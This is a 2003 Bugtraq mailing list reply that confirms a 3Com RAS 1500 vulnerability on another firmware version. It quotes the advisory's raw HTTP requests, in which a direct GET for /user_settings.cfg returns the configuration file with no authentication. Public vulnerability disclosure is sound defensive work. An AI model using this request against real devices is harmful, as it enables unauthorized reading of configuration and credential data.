Bugtraq mailing list archives
re:3com RAS 1500 Remote vulnerabilities.
From: Jan Kachlik <jkachlik () isgroup com>
Date: Tue, 1 Apr 2003 15:11:03 +0200
Hi Piotr Chytla
Synopsis: 3com RAS 1500 Remote vulnerabilities. Product: 3C433279A-US http://www.3com/ras1500 Version: Firmware X2.0.10 URL: http://isec.pl/vulnerabilities/isec-0009-3com-ras.txt Author: Piotr Chytla <pch () isec pl> Date: February 27, 2003
I tested second bug on SuperStack II Remote Access System 1500, Version: 2.5.0, 159, and working...
Issue: - ------ 3com SuperStack II Remote Access System 1500 is telco device which provides access via BRI-ISDN/Analog to dialin users. It contains two remote vulnerabilities, first is Denial Of Service that leads to system crash, second can be used to read configuration files.
2. Configuration file read Unauthorized user can read configuration and system files, using web interface on RAS 1500 . GET /download.htm HTTP/1.0 HTTP/1.0 401 Unauthorized WWW-Authenticate: Basic realm="RAS1500" Content-Type: text/html Server: Allegro-Software-RomPager/2.10 GET /user_settings.cfg HTTP/1.0 HTTP/1.0 200 OK Content-Type: multipart Date: Mon, 25 May 1998 00:26:38 GMT Last-Modified: Tue, 01 Jan 1901 00:00:01 GMT Content-Length: 1258 Server: Allegro-Software-RomPager/2.10 [..]
content of user_setting.cfg -- Best regards, Jan Kachlik jkachlik () isgroup com +---------------------------------+ ' Kachlik Jan ' ' Security & Network Specialist ' ' InterSource Solutions Group ' ' Mathonova 25, 613 00 Brno CZ ' ' Mail: jkachlik () isgroup com ' ' Mail: jkachlik () hacktrack com ' ' GSM: +420.728.662.807 ' ' ICQ: #56618470 ' ' WebSite: http://www.isgroup.com ' +---------------------------------+
Current thread:
- re:3com RAS 1500 Remote vulnerabilities. Jan Kachlik (Apr 02)